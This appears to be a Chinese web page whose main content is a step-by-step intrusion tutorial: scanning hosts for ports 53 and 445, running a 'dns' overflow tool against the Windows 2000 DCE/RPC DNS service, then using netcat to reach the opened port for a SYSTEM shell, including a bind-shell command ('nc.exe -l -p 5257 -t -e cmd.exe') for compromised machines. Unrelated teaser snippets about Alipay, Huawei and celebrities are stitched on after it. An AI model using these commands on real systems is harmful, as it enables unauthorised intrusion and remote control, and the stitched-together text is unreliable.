前提是必须要开放53、445端口 1、选择superscan进行扫描,在端口列表中勾选上53、445端口,然后选择主机段进行扫描. 2、选择存在53、445端口的主机,在cmd下输入dns -t ip对主机进行特定漏洞端口扫描,"1028 :Vulnerability"表示 1028端口存在溢出漏洞,"os:window 2000"表示系统类型为window 2000. 3、在执行dns -t 2000all ip 1028 对目标主机进行溢出.connection to target host tcp port established 成功连接到主机的tcp端口上, successfully bound to the vulnerale dcerpc interface 已经连接到对方的rpc端口上,os fingerprint result:windows 2000 系统指纹鉴定对方是wind2000系统,attack sent,check port 1100 攻击代码已经成功发送,并尝试连接1100端口.当出现最后这一句提示语句的时候就意味着我们要成功了. 4、怎么连接对方的1100端口呢,当然我们要使用nc了. 5、nc全称叫"netcat",这是一个非常简单易用的基于tcp/ip协议(c/s模型的)的"瑞士军刀". 下面介绍一下它的几个常用功能 1、nc.exe -vv -l -p 6069,表示在本地6069端口上进行监听.-vv:显示详细的信息.-l:进行监听,监听入站信息.-p:监听所使用的端口号. 2、正如我们遇到的情况,对方已经开放了一个端口.他在等待我们连接哦,连接上去会有什么呢?当然是system权限的shell了.nc.exe -vv 127.0.0.1 5257,连接ip为127.0.0.1的5257端口. 3、还可以在本地监听端口的同时绑定shell,就相当于一个telnet服务端.通常这个命令在肉鸡上执行,然后当我们连接上去就可以获得这个shell了.nc.exe -l -p 5257 -t -e cmd.exe,在本机5257端口上监听并绑定cmd.exe.-e 作用就是程序定向.-t以telnet的形式来应答. 4、它可以用来手动对主机提交数据包(通常为80)端口,nc.exe -vv 127.0.0.1 80
刚刚进入9月,不知道喜欢用支付宝的朋友们发现了没,本月支付宝仍然有不小的福利可以领取,如果运气好,你的生活费都可以让支付宝包了,当然,一般人都没那好运,所以,小编以为,全包就不必了,半包我也不介意。...
华为手机可谓人尽皆知,家喻户晓,但是华为不仅研制手机,还有各类手机用的到的物件,比如自拍杆。大家都纷纷猜测,华为家的自拍杆究竟好用吗?小编用过以后得出两个字:专业。...
文|华商韬略安曼摘要:板蓝根“功成身退”,载入历史。但从今天开始,双黄连出场了。正文:李佳琦,一个拥有“神”一般带货能力的网红,曾创下“一场直播卖出2万3千支口红,成交金额353万”的记录。在2019...
永泰旅游(丽江攻略自由行4天) 远离生活的俗气和喧嚣, 享受自然, 你需要一份最in旅游景点推荐。 要既能玩耍还有各种美食暖胃 那福州这个地方定会纳入名单! ▼ 永 泰 拥着绿水青山...
此前在综艺节目《新生日记》当中,只剩下马剑越最后一名孕妈未生下孩子,今日,终于有好消息传来,马剑越于10月31产子,那么,马剑越生的男孩女孩?下面友谊长存小编就快来说说。 奇葩说马剑越生子 前几日...
6月29日,中国首个结合了选、买、卖车,以及与车相关增值服务的一站式汽车交易平台“淘车”品牌发布。淘车是易鑫集团的生态化战略当中,定位大交易平台的一步重棋。我们知道,易鑫一直以打造汽车交易生态布局为使...